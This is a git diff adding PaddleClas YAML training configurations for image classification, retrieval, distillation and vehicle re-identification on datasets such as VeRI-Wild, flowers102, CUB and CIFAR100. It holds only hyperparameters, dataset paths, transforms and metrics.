/dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Vehicle/ResNet50_ReID.yaml @@ -0,0 +1,155 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: "./output/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 160 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + eval_mode: "retrieval" + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: "ArcMargin" + embedding_size: 512 + class_num: 30671 + margin: 0.15 + scale: 32 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - SupConLoss: + weight: 1.0 + views: 2 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + regularizer: + name: 'L2' + coeff: 0.0005 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images/" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/train_list_start0.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + + sampler: + name: PKSampler + batch_size: 128 + sample_per_id: 2 + drop_last: True + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + Eval: + Query: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/test_3000_id_query.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + + Gallery: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/test_3000_id.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + - mAP: {} + diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/MobileNetV1_retrieval.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/MobileNetV1_retrieval.yaml new file mode 100644 index 0000000..99f9a12 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/MobileNetV1_retrieval.yaml @@ -0,0 +1,158 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 5 + eval_during_train: True + eval_interval: 1 + epochs: 50 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + eval_mode: retrieval + +# model architecture +Arch: + name: RecModel + infer_output_key: features + infer_add_softmax: False + + Backbone: + name: MobileNetV1 + pretrained: False + BackboneStopLayer: + name: flatten_0 + Neck: + name: FC + embedding_size: 1024 + class_num: 512 + Head: + name: ArcMargin + embedding_size: 512 + class_num: 101 + margin: 0.15 + scale: 30 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - TripletLossV2: + weight: 1.0 + margin: 0.5 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: MultiStepDecay + learning_rate: 0.01 + milestones: [20, 30, 40] + gamma: 0.5 + verbose: False + last_epoch: -1 + regularizer: + name: 'L2' + coeff: 0.0005 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: VeriWild + image_root: ./dataset/CUB_200_2011/ + cls_label_path: ./dataset/CUB_200_2011/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + sampler: + name: DistributedRandomIdentitySampler + batch_size: 64 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + Query: + dataset: + name: VeriWild + image_root: ./dataset/CUB_200_2011/ + cls_label_path: ./dataset/CUB_200_2011/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + + Gallery: + dataset: + name: VeriWild + image_root: ./dataset/CUB_200_2011/ + cls_label_path: ./dataset/CUB_200_2011/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + - mAP: {} + diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/MobileNetV3_large_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/MobileNetV3_large_x1_0.yaml new file mode 100644 index 0000000..394f201 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/MobileNetV3_large_x1_0.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 20 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x1_0 + class_num: 102 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.00375 + warmup_epoch: 5 + last_epoch: -1 + regularizer: + name: 'L2' + coeff: 0.000001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/flowers102/ + cls_label_path: ./dataset/flowers102/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 32 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/flowers102/ + cls_label_path: ./dataset/flowers102/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/ResNet50_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/ResNet50_vd.yaml new file mode 100644 index 0000000..1b4e844 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/ResNet50_vd.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 102 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 20 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50_vd + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.0125 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/flowers102/ + cls_label_path: ./dataset/flowers102/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 32 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/flowers102/ + cls_label_path: ./dataset/flowers102/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/HRNet_W18_C_finetune_kunlun.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/HRNet_W18_C_finetune_kunlun.yaml new file mode 100644 index 0000000..6a461cc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/HRNet_W18_C_finetune_kunlun.yaml @@ -0,0 +1,68 @@ +mode: 'train' +ARCHITECTURE: + name: 'HRNet_W18_C' +pretrained_model: "./pretrained/HRNet_W18_C_pretrained" +model_save_dir: "./output/" +classes_num: 102 +total_images: 1020 +save_interval: 1 +validate: True +valid_interval: 1 +epochs: 10 +topk: 5 +image_shape: [3, 224, 224] + +LEARNING_RATE: + function: 'Cosine' + params: + lr: 0.00375 + +OPTIMIZER: + function: 'Momentum' + params: + momentum: 0.9 + regularizer: + function: 'L2' + factor: 0.000001 + +TRAIN: + batch_size: 20 + num_workers: 0 + file_list: "./dataset/flowers102/train_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1./255. + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +VALID: + batch_size: 20 + num_workers: 0 + file_list: "./dataset/flowers102/val_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/ResNet50_vd_finetune_kunlun.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/ResNet50_vd_finetune_kunlun.yaml new file mode 100644 index 0000000..7fad5ee --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/ResNet50_vd_finetune_kunlun.yaml @@ -0,0 +1,69 @@ +mode: 'train' +ARCHITECTURE: + name: 'ResNet50_vd' +pretrained_model: "./pretrained/ResNet50_vd_pretrained" +load_static_weights: true +model_save_dir: "./output/" +classes_num: 102 +total_images: 1020 +save_interval: 1 +validate: True +valid_interval: 1 +epochs: 20 +topk: 5 +image_shape: [3, 224, 224] + +LEARNING_RATE: + function: 'Cosine' + params: + lr: 0.00375 + +OPTIMIZER: + function: 'Momentum' + params: + momentum: 0.9 + regularizer: + function: 'L2' + factor: 0.000001 + +TRAIN: + batch_size: 20 + num_workers: 1 + file_list: "./dataset/flowers102/train_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1./255. + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +VALID: + batch_size: 20 + num_workers: 1 + file_list: "./dataset/flowers102/val_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/VGG16_finetune_kunlun.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/VGG16_finetune_kunlun.yaml new file mode 100644 index 0000000..389a5f3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/VGG16_finetune_kunlun.yaml @@ -0,0 +1,70 @@ +mode: 'train' +ARCHITECTURE: + name: 'VGG16' + params: + stop_grad_layers: 5 +pretrained_model: "./pretrained/VGG16_pretrained" +model_save_dir: "./output/" +classes_num: 102 +total_images: 1020 +save_interval: 1 +validate: True +valid_interval: 1 +epochs: 20 +topk: 5 +image_shape: [3, 224, 224] + +LEARNING_RATE: + function: 'Cosine' + params: + lr: 0.0005 + +OPTIMIZER: + function: 'Momentum' + params: + momentum: 0.9 + regularizer: + function: 'L2' + factor: 0.00001 + +TRAIN: + batch_size: 20 + num_workers: 0 + file_list: "./dataset/flowers102/train_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1./255. + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +VALID: + batch_size: 20 + num_workers: 0 + file_list: "./dataset/flowers102/val_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/VGG19_finetune_kunlun.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/VGG19_finetune_kunlun.yaml new file mode 100644 index 0000000..6ba38b9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/VGG19_finetune_kunlun.yaml @@ -0,0 +1,70 @@ +mode: 'train' +ARCHITECTURE: + name: 'VGG19' + params: + stop_grad_layers: 5 +pretrained_model: "./pretrained/VGG19_pretrained" +model_save_dir: "./output/" +classes_num: 102 +total_images: 1020 +save_interval: 1 +validate: True +valid_interval: 1 +epochs: 20 +topk: 5 +image_shape: [3, 224, 224] + +LEARNING_RATE: + function: 'Cosine' + params: + lr: 0.0005 + +OPTIMIZER: + function: 'Momentum' + params: + momentum: 0.9 + regularizer: + function: 'L2' + factor: 0.00001 + +TRAIN: + batch_size: 20 + num_workers: 0 + file_list: "./dataset/flowers102/train_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1./255. + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +VALID: + batch_size: 20 + num_workers: 0 + file_list: "./dataset/flowers102/val_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/new_user/ShuffleNetV2_x0_25.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/new_user/ShuffleNetV2_x0_25.yaml new file mode 100644 index 0000000..f58522c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/new_user/ShuffleNetV2_x0_25.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: cpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 20 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x0_25 + class_num: 102 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.0125 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/flowers102/ + cls_label_path: ./dataset/flowers102/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/flowers102/ + cls_label_path: ./dataset/flowers102/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/MobileNetV1_multilabel.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/MobileNetV1_multilabel.yaml new file mode 100644 index 0000000..6838710 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/MobileNetV1_multilabel.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 10 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + use_multilabel: True +# model architecture +Arch: + name: MobileNetV1 + class_num: 33 + pretrained: True + +# loss function config for traing/eval process +Loss: + Train: + - MultiLabelLoss: + weight: 1.0 + Eval: + - MultiLabelLoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: MultiLabelDataset + image_root: ./dataset/NUS-WIDE-SCENE/NUS-SCENE-dataset/images/ + cls_label_path: ./dataset/NUS-WIDE-SCENE/NUS-SCENE-dataset/multilabel_train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: MultiLabelDataset + image_root: ./dataset/NUS-WIDE-SCENE/NUS-SCENE-dataset/images/ + cls_label_path: ./dataset/NUS-WIDE-SCENE/NUS-SCENE-dataset/multilabel_test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: ./deploy/images/0517_2715693311.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: MultiLabelTopk + topk: 5 + class_id_map_file: None + +Metric: + Train: + - HammingDistance: + - AccuracyScore: + Eval: + - HammingDistance: + - AccuracyScore: diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/MobileNetV3_large_x1_0_CIFAR100_finetune.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/MobileNetV3_large_x1_0_CIFAR100_finetune.yaml new file mode 100644 index 0000000..f0b864d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/MobileNetV3_large_x1_0_CIFAR100_finetune.yaml @@ -0,0 +1,127 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 100 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 32, 32] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x1_0 + class_num: 100 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/CIFAR100/ + cls_label_path: ./dataset/CIFAR100/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 32 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/CIFAR100/ + cls_label_path: ./dataset/CIFAR100/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/R50_vd_distill_MV3_large_x1_0_CIFAR100.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/R50_vd_distill_MV3_large_x1_0_CIFAR100.yaml new file mode 100644 index 0000000..b2447c2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/R50_vd_distill_MV3_large_x1_0_CIFAR100.yaml @@ -0,0 +1,151 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: "./output/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 100 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 32, 32] + save_inference_dir: "./inference" + +# model architecture +Arch: + name: "DistillationModel" + # if not null, its lengths should be same as models + pretrained_list: + # if not null, its lengths should be same as models + freeze_params_list: + - True + - False + models: + - Teacher: + name: ResNet50_vd + class_num: 100 + pretrained: "./pretrained/best_model" + - Student: + name: MobileNetV3_large_x1_0 + class_num: 100 + pretrained: True + + infer_model_name: "Student" + + +# loss function config for traing/eval process +Loss: + Train: + - DistillationCELoss: + weight: 1.0 + model_name_pairs: + - ["Student", "Teacher"] + Eval: + - DistillationGTCELoss: + weight: 1.0 + model_names: ["Student"] + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: "./dataset/CIFAR100/" + cls_label_path: "./dataset/CIFAR100/train_list.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 32 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: "./dataset/CIFAR100/" + cls_label_path: "./dataset/CIFAR100/test_list.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + +Infer: + infer_imgs: "docs/images/whl/demo.jpg" + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: DistillationPostProcess + func: Topk + topk: 5 + +Metric: + Train: + - DistillationTopkAcc: + model_key: "Student" + topk: [1, 5] + Eval: + - DistillationTopkAcc: + model_key: "Student" + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/ResNet50_vd_CIFAR100.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/ResNet50_vd_CIFAR100.yaml new file mode 100644 index 0000000..3977969 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/ResNet50_vd_CIFAR100.yaml @@ -0,0 +1,127 @@ +# global configs 